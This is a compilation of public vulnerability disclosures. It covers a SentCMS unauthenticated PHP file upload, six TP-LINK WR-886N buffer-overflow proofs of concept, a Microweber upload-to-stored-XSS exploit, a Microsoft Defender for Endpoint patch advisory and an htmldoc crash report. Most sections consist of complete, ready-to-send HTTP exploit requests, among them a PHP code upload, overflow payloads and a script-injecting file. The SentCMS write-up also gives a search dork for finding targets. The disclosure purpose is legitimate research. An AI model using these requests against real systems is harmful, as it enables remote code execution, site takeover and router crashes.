sentcms 4.0.x allows remote attackers to cause arbitrary file uploads through an unauthorized file upload interface, resulting in php code execution in /admin/upload/upload.

****Google Dork:****

sentcms

****Exp methods :****

Vulnerability description: Arbitrary file uploads are possible without login

Vulnerability Location.

> /user/upload/upload
> 
> /admin/upload/upload

Both of the above interfaces are vulnerable to arbitrary file uploads

If the following page appears, a vulnerability exists

![image-20220206032920568](https://hanayuzu-images.oss-cn-hangzhou.aliyuncs.com/images/image-20220206032920568.png)

![image-20220206032944553](https://hanayuzu-images.oss-cn-hangzhou.aliyuncs.com/images/image-20220206032944553.png)

**Vulnerability recurrence：**

Modify the url at the pink arrow to be the home site, then post the package, and the successful upload will return the phpinfo connection

If you can’t upload, modify the time of the post package.

> The requested interface can be either “/user/upload/upload” or “/admin/upload/upload”

![image-20220204021956537](https://hanayuzu-images.oss-cn-hangzhou.aliyuncs.com/images/image-20220204021956537.png)

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  
31  
32  
33  
34  
35  
36  
37  
38  
39  
40  
41  
42  
43  
44  
45  
46  
47  

POST /user/upload/upload HTTP/1.1  
Host: target.com  
Cookie: PHPSESSID=7901b5229557c94bad46e16af23a3728  
Content-Length: 894  
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36  
Sec-Ch-Ua-Platform: "Windows"  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz  
Accept: \*/\*  
Origin: https://info.ziwugu.vip/  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://target.com/user/upload/index?name=icon&type=image&limit=1  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,ja-CN;q=0.8,ja;q=0.7,en;q=0.6  
Connection: close  
  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="id"  
  
WU\_FILE\_0  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="name"  
  
test.jpg  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="type"  
  
image/jpeg  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="lastModifiedDate"  
  
Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="size"  
  
164264  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="file"; filename="test.php"  
Content-Type: image/jpeg  
  
JFIF  
<?php phpinfo();?>  
  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz--  

![image-20220204021215525](https://hanayuzu-images.oss-cn-hangzhou.aliyuncs.com/images/image-20220204021215525.png)

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Hanayuzu'Blog！

CVE-2022-24652: Sentcms任意文件上传漏洞

A Buffer Overflow vulnerability exists in TP-LINK WR-886N 20190826 2.3.8 in the /cloud_config/router_post/upgrade_info feature, which allows malicious users to execute arbitrary code on the system via a crafted post request.

**TP-LINK WR-886N Vulnerability**

This vulnerability is on the /cloud\_config/router\_post/upgrade\_info interface and affects the latest version of the router operating system (which is a different RTOS system from the linux operating system), and the firmware version is TL-WR886N V6.0 upgrade software 20190826 2.3.8

**Vulnerability description**

There is a buffer overflow vulnerability on the /cloud\_config/router\_post/upgrade\_info interface.

1.  An interface `/cloud_config/router_post/upgrade_info` is registered first in the upgradeInfoRegister function. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/upgradeInfoRegister/upgradeInfoRegister1.png)
2.  In the handler, the v7 variable is the `version` field in the packet, and the v9 variable is the `release_date` field in the packet,and the v11 variable is the `download_url` field in the packet,and the v16 variable is the `release_log` field in the packet. Then directly memcpy to the a3 variable refers to the address space, there is a buffer overflow problem. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/upgradeInfoRegister/upgradeInfoRegister2.png)

**poc**

    POST /cloud_config/router_post/cloud_reply/upgrade_info HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 717
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;
    Accept: */*
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    Type=1&version=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&release_date=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&download_url=cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc&release_log=ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    

**Acknowledgment**

Credit to @Yu3H0 ,@leonW7, @cpegg from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

CVE-2021-44632: IoT_CVE/886N/upgradeInfoRegister at main · Yu3H0/IoT_CVE

A Buffer Overflow vulnerability exists in TP-LINK WR-886N 20190826 2.3.8 in the /cloud_config/router_post/reset_cloud_pwd feature, which allows malicous users to execute arbitrary code on the system via a crafted post request.

**TP-LINK WR-886N Vulnerability**

This vulnerability is on the /cloud\_config/router\_post/reset\_cloud\_pwd interface and affects the latest version of the router operating system (which is a different RTOS system from the linux operating system), and the firmware version is TL-WR886N V6.0 upgrade software 20190826 2.3.8

**Vulnerability description**

There is a buffer overflow vulnerability on the /cloud\_config/router\_post/reset\_cloud\_pwd interface.

1.  An interface `/cloud_config/router_post/reset_cloud_pwd` is registered first in the resetCloudPwdRegister function. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/resetCloudPwdRegister/resetCloudPwdRegister1.png)
2.  In the handler, the v7 variable is the `username` field in the packet, and the v9 variable is the `password` field in the packet,and the v11 variable is the `verify_code` field in the packet. Then directly memcpy to the a3 variable refers to the address space, there is a buffer overflow problem. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/resetCloudPwdRegister/resetCloudPwdRegister2.png)

**poc**

    POST /cloud_config/router_post/reset_cloud_pwd HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 717
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;
    Accept: */*
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&password=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&verify_code=cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc&account_type=ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    

**Acknowledgment**

Credit to @Yu3H0 ,@leonW7, @cpegg from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

CVE-2021-44631: IoT_CVE/886N/resetCloudPwdRegister at main · Yu3H0/IoT_CVE

A Buffer Overflow vulnerability exists in TP-LINK WR-886N 20190826 2.3.8 in the /cloud_config/router_post/modify_account_pwd feature, which allows malicious users to execute arbitrary code on the system via a crafted post request.

**TP-LINK WR-886N Vulnerability**

This vulnerability is on the /cloud\_config/router\_post/modify\_account\_pwd interface and affects the latest version of the router operating system (which is a different RTOS system from the linux operating system), and the firmware version is TL-WR886N V6.0 upgrade software 20190826 2.3.8

**Vulnerability description**

There is a buffer overflow vulnerability on the /cloud\_config/router\_post/modify\_account\_pwd interface.

1.  An interface `/cloud_config/router_post/modify_account_pwd` is registered first in the modifyAccPwdRegister function. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/modifyAccPwdRegister/modifyAccPwdRegister1.png)
2.  In the handler, the v7 variable is the `username` field in the packet, and the v9 variable is the `old_pwd` field in the packet,and the v11 variable is the `new_pwd` field in the packet. Then directly memcpy to the a3 variable refers to the address space, there is a buffer overflow problem. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/modifyAccPwdRegister/modifyAccPwdRegister2.png)

**poc**

    POST /cloud_config/router_post/modify_account_pwd HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 717
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;
    Accept: */*
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&old_pwd=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&new_pwd=cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
    

**Acknowledgment**

Credit to @Yu3H0 ,@leonW7, @cpegg from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

CVE-2021-44630: IoT_CVE/886N/modifyAccPwdRegister at main · Yu3H0/IoT_CVE

A Buffer Overflow vulnerabilitiy exists in TP-LINK WR-886N 20190826 2.3.8 in the /cloud_config/router_post/register feature, which allows malicious users to execute arbitrary code on the system via a crafted post request.

**TP-LINK WR-886N Vulnerability**

This vulnerability is on the /cloud\_config/router\_post/register interface and affects the latest version of the router operating system (which is a different RTOS system from the linux operating system), and the firmware version is TL-WR886N V6.0 upgrade software 20190826 2.3.8

**Vulnerability description**

There is a buffer overflow vulnerability on the /cloud\_config/router\_post/register interface.

1.  An interface `/cloud_config/router_post/register` is registered first in the registerRegister function. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/registerRegister/registerRegister1.png)
2.  In the handler, the v7 variable is the `username` field in the packet, and the v9 variable is the `password` field in the packet,and the v11 variable is the `verify_code` field in the packet. Then directly memcpy to the a3 variable refers to the address space, there is a buffer overflow problem. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/registerRegister/registerRegister2.png)

**poc**

    POST /cloud_config/router_post/register HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 717
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;
    Accept: */*
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&password=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&verify_code=cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc&account_type=ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    

**Acknowledgment**

Credit to @Yu3H0 ,@leonW7, @cpegg from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

CVE-2021-44629: IoT_CVE/886N/registerRegister at main · Yu3H0/IoT_CVE

A Buffer Overflow vulnerabiltiy exists in TP-LINK WR-886N 20190826 2.3.8 in thee /cloud_config/router_post/login feature, which allows malicious users to execute arbitrary code on the system via a crafted post request.

**TP-LINK WR-886N Vulnerability**

This vulnerability is on the /cloud\_config/router\_post/login interface and affects the latest version of the router operating system (which is a different RTOS system from the linux operating system), and the firmware version is TL-WR886N V6.0 upgrade software 20190826 2.3.8

**Vulnerability description**

There is a buffer overflow vulnerability on the /cloud\_config/router\_post/login interface.

1.  An interface `/cloud_config/router_post/login` is registered first in the loginRegister function. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/loginRegister/loginRegister1.png)
2.  In the handler, the v7 variable is the `username` field in the packet, and the v9 variable is the `password` field in the packet. Then directly memcpy to the a3 variable refers to the address space, there is a buffer overflow problem. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/loginRegister/loginRegister2.png)

**poc**

    POST /cloud_config/router_post/login HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 717
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;
    Accept: */*
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&password=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
    

**Acknowledgment**

Credit to @Yu3H0 ,@leonW7, @cpegg from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

CVE-2021-44628: IoT_CVE/886N/loginRegister at main · Yu3H0/IoT_CVE

A Buffer Overflow vulnerability exists in TP-LINK WR-886N 20190826 2.3.8 in the /cloud_config/router_post/get_reset_pwd_veirfy_code feature, which allows malicious users to execute arbitrary code on the system via a crafted post request.

**TP-LINK WR-886N Vulnerability**

This vulnerability is on the /cloud\_config/router\_post/get\_reset\_pwd\_veirfy\_code interface and affects the latest version of the router operating system (which is a different RTOS system from the linux operating system), and the firmware version is TL-WR886N V6.0 upgrade software 20190826 2.3.8

**Vulnerability description**

There is a buffer overflow vulnerability on the /cloud\_config/router\_post/get\_reset\_pwd\_veirfy\_code interface.

1.  An interface `/cloud_config/router_post/get_reset_pwd_veirfy_code` is registered first in the getResetVeriRegister function. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/getResetVeriRegister/getResetVeriRegister1.png)
2.  In the handler, the v7 variable is the `username` field in the packet, and the v9 variable is the `account_type` field in the packet. Then directly memcpy to the a3 variable refers to the address space, there is a buffer overflow problem. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/getResetVeriRegister/getResetVeriRegister2.png)

**poc**

    POST /cloud_config/router_post/get_reset_pwd_veirfy_code HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 717
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;
    Accept: */*
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&account_type=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
    

**Acknowledgment**

Credit to @Yu3H0 ,@leonW7, @cpegg from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

CVE-2021-44627: IoT_CVE/886N/getResetVeriRegister at main · Yu3H0/IoT_CVE

Unrestricted file upload leads to stored XSS in GitHub repository microweber/microweber prior to 1.1.12.

**Description**

A user can bypass checking and upload `.aspx` file which lead to stored XSS.

**Proof of Concept**

*   Log in as admin: https://demo.microweber.org/demo/admin/
*   Go to Websites > Edit a page.
*   Under **Pictures**, choose **Add files**
*   Instead of uploading a normal picture, use the below request to upload an `aspx` file.

\-- The request to upload:

    POST /demo/plupload HTTP/1.1
    Host: demo.microweber.org
    Cookie: csrf-token-data=%7B%22value%22%3A%22LbUJYT94IdMzaqSj3tCwbEgp402H94lb3LBdoQK8%22%2C%22expiry%22%3A1646836721840%7D; laravel_session=ZNv8dU4zHigWLlPFd8LQoeMyJtWGy8GK5Su1IA2F; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/
    Content-Length: 533
    Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"
    Accept: application/json, text/javascript, */*; q=0.01
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7ACkSBriVfqdfw4D
    X-Requested-With: XMLHttpRequest
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
    Sec-Ch-Ua-Platform: "macOS"
    Origin: https://demo.microweber.org
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.microweber.org/demo/admin/page/24/edit
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    ------WebKitFormBoundary7ACkSBriVfqdfw4D
    Content-Disposition: form-data; name="name"
    
    xss.aspx
    ------WebKitFormBoundary7ACkSBriVfqdfw4D
    Content-Disposition: form-data; name="chunk"
    
    0
    ------WebKitFormBoundary7ACkSBriVfqdfw4D
    Content-Disposition: form-data; name="chunks"
    
    1
    ------WebKitFormBoundary7ACkSBriVfqdfw4D
    Content-Disposition: form-data; name="file"; filename="blob"
    Content-Type: text/html
    
    <html>
    <script>alert(document.domain)</script>
    </html>
    IEND®B`
    ------WebKitFormBoundary7ACkSBriVfqdfw4D--
    
    

The response:

    HTTP/1.1 200 OK
    Date: Wed, 09 Mar 2022 14:26:01 GMT
    Server: Apache
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Last-Modified: Wed, 09 Mar 2022 14:26:01 GMT
    Connection: close
    Content-Type: application/json
    Content-Length: 123
    
    {"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/xss.aspx","name":"xss.aspx","bytes_uploaded":"533"}
    

![request-response](https://bu.gbounty.cc/5b2b391d35fd687ff6bebe0bd3ac2b40/request-response.png)

*   Visit `https://demo.microweber.org/demo/userfiles/media/default/xss.aspx` to confirm the XSS.

![XSS](https://bu.gbounty.cc/5b2b391d35fd687ff6bebe0bd3ac2b40/XSS.png)

**Impact**

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user, in this case, an admin.

CVE-2022-0906: Unrestricted file upload leads to stored XSS in microweber

Microsoft released a security update to address CVE-2022-23278 in Microsoft Defender for Endpoint. This important class spoofing vulnerability impacts all platforms. We wish to thank Falcon Force for the collaboration on addressing this issue through coordinated vulnerability disclosure.
Cybercriminals are looking for any opening to tamper with security protections in order to blind, confuse, or often shut off customer defenses.

Microsoft released a security update to address CVE-2022-23278 in Microsoft Defender for Endpoint. This important class spoofing vulnerability impacts all platforms. We wish to thank Falcon Force for the collaboration on addressing this issue through coordinated vulnerability disclosure.

Cybercriminals are looking for any opening to tamper with security protections in order to blind, confuse, or often shut off customer defenses. Microsoft continuously works to defeat these methods to help our customers protect their environment and gain visibility when attacks occur, both through our own research and in partnership with the security community. With our March security update release, we are further hardening Microsoft Defender for Endpoint by addressing the ability for attackers to spoof information between the client and the service. This vulnerability impacts all platforms and the updates we have released should be deployed just like any other security update. On Windows, this is part of the March Cumulative Update for Windows so if automatic updates are scheduled, no further action is necessary. For those who do not have automatic updates turned on, we recommend doing so. Customers using the latest operating systems benefit from new operating system capabilities that allow strong protections. Instructions for the normal deployment method are below:

Release Channel

Available

Next Step

Windows Update and Microsoft Update

Yes

None. This update will be downloaded and installed automatically from Windows Update.

Windows Update for Business

Yes

None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.

Microsoft Update Catalog

Yes

To get the standalone package for this update, go to the Microsoft Update Catalog website.

Windows Server Update Services (WSUS)

Yes

This update will automatically sync with WSUS if you configure **Products and Classifications** as follows: **Product:** Windows 11, Windows 10, Windows Server 2016, Windows Server 2019, or Windows Server 2022. **Classification** : Security Updates Products past end of life will not receive the update

Microsoft AutoUpdate for macOS

Yes

Information on automatic or manual configuration can be found here.

Updates for Linux

Yes

Information on manual installation can be found here.

Google Play Store

Yes

Information on deploying and configuring updates on Android can be found here.

Apple App Store

Yes

Information on deploying and configuring updates on iOS can be found here.

At time of publication, Microsoft is not aware of any attacks that have leveraged this vulnerability. In addition to the security update, Microsoft has released detections for possible exploit activity. Customers should monitor for those detections (list below) and consult the threat analytics article (requires license and access) which surfaces risk and possible exploit activity.

*   Suspicious client communication – detects suspicious client communication which could either be caused by device spoofing or duplicate device IDs.

Customers are encouraged to apply the March security updates as soon as possible. Official documentation on the updates can be found here: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23278.

\- Microsoft Defender for Endpoint Team

Guidance for CVE-2022-23278 spoofing in Microsoft Defender for Endpoint

Null pointer dereference in the htmldoc v1.9.11 and before may allow attackers to execute arbitrary code and cause a denial of service via a crafted html file.

While fuzzing htmldoc I found a segmentation fault in the copy\_image() function, in epub.cxx:1221

testcase:(zipped so GitHub accepts it)  
crash01.html.zip

reproduced by running:

    htmldoc -f demo.epub  crash01.html 
    

htmldoc Version v1.9.11 git \[master 0f9d20\]  
tested on:

OS :Ubuntu 20.04.1 LTS  
kernel: 5.4.0-53-generic  
compiler: clang version 10.0.0-4ubuntu1  
Target: x86\_64-pc-linux-gnu

OS : macOS Catalina 10.15.5(19F101) MacBook Pro (Retina, 13-inch, Early 2015)  
compiler: Apple clang version 11.0.0 (clang-1100.0.33.17)

Install from snap or download mac dmg don't crash for this testcase.

*   addresssanitizer

    ==3252595==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000042fc30 bp 0x7ffe6ab48d00 sp 0x7ffe6ab484a0 T0)
    ==3252595==The signal is caused by a READ memory access.
    ==3252595==Hint: address points to the zero page.
        #0 0x42fc30 in strcmp (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x42fc30)
        #1 0x7f70ce1fd7c7 in bsearch /build/glibc-ZN95T4/glibc-2.31/stdlib/../bits/stdlib-bsearch.h:33:23
        #2 0x4c81b0 in copy_image(_zipc_s*, char const*) /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:1221:25
        #3 0x4c8434 in copy_images(_zipc_s*, tree_str*) /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:1288:11
        #4 0x4c71c5 in epub_export /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:211:13
        #5 0x4d0f13 in main /home/chiba/check_crash/htmldoc/htmldoc/htmldoc.cxx:1291:3
        #6 0x7f70ce1dd0b2 in __libc_start_main /build/glibc-ZN95T4/glibc-2.31/csu/../csu/libc-start.c:308:16
        #7 0x41c5fd in _start (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x41c5fd)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x42fc30) in strcmp
    ==3252595==ABORTING
    

*   gdb

    ─[ DISASM ]─
     ► 0x7ffff7de1ed7 <__strcmp_avx2+887>    vmovdqu ymm1, ymmword ptr [rdi + rdx]
       0x7ffff7de1edc <__strcmp_avx2+892>    vpcmpeqb ymm0, ymm1, ymmword ptr [rsi + rdx]
       0x7ffff7de1ee1 <__strcmp_avx2+897>    vpminub ymm0, ymm0, ymm1
       0x7ffff7de1ee5 <__strcmp_avx2+901>    vpcmpeqb ymm0, ymm0, ymm7
       0x7ffff7de1ee9 <__strcmp_avx2+905>    vpmovmskb ecx, ymm0
       0x7ffff7de1eed <__strcmp_avx2+909>    test   ecx, ecx
       0x7ffff7de1eef <__strcmp_avx2+911>    jne    __strcmp_avx2+848 <__strcmp_avx2+848>
        ↓
       0x7ffff7de1eb0 <__strcmp_avx2+848>    add    rdi, rdx
       0x7ffff7de1eb3 <__strcmp_avx2+851>    add    rsi, rdx
       0x7ffff7de1eb6 <__strcmp_avx2+854>    tzcnt  edx, ecx
       0x7ffff7de1eba <__strcmp_avx2+858>    movzx  eax, byte ptr [rdi + rdx]
    ─[ STACK ]──
    00:0000│ rsp  0x7fffffffd948 —▸ 0x7ffff7ca27c8 (bsearch+88) ◂— test   eax, eax
    01:0008│      0x7fffffffd950 —▸ 0x555555aa6bc0 —▸ 0x555555aa6fd0 —▸ 0x7ffff7e47000 (main_arena+1152) —▸ 0x7ffff7e46ff0 (main_arena+1136) ◂— ...
    02:0010│      0x7fffffffd958 ◂— 0x8
    03:0018│      0x7fffffffd960 ◂— 0x0
